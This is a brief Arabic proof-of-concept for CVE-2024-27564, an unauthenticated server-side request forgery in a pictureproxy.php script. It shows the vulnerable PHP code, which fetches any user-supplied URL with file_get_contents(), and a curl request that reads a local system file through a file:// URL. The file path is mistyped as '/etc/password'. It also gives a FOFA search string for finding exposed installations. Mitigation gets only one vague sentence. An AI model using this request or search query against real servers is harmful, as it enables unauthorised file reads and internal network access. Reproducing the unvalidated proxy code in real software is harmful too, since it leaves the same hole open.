
إثبات مفهوم لـ CVE-2024-27564، وهو SSRF غير مُصادَق عليه في pictureproxy.php عبر معامل url، مع الكود القابل للاستغلال، وcurl PoC، وملاحظات التخفيف.
تسمح ثغرة في pictureproxy.php للمهاجمين عن بُعد بتنفيذ طلبات عشوائية عبر حقن عناوين URL في معامل url. يمكن استغلال ثغرة SSRF هذه دون مصادقة، مما يجعلها خطيرة بشكل خاص.
يوجد الكود المصاب في ملف pictureproxy.php. تحدث المشكلة لأن الدالة لا تتحقق بشكل صحيح من معامل url. يتم تمرير المتغير $_GET['url'] إلى الدالة file_get_contents()، التي تجلب المحتوى من عنوان URL المحدد. قد يؤدي هذا إلى SSRF.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
طلب Curl:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
هناك حاجة إلى إدارة سليمة للتحقق من المدخلات.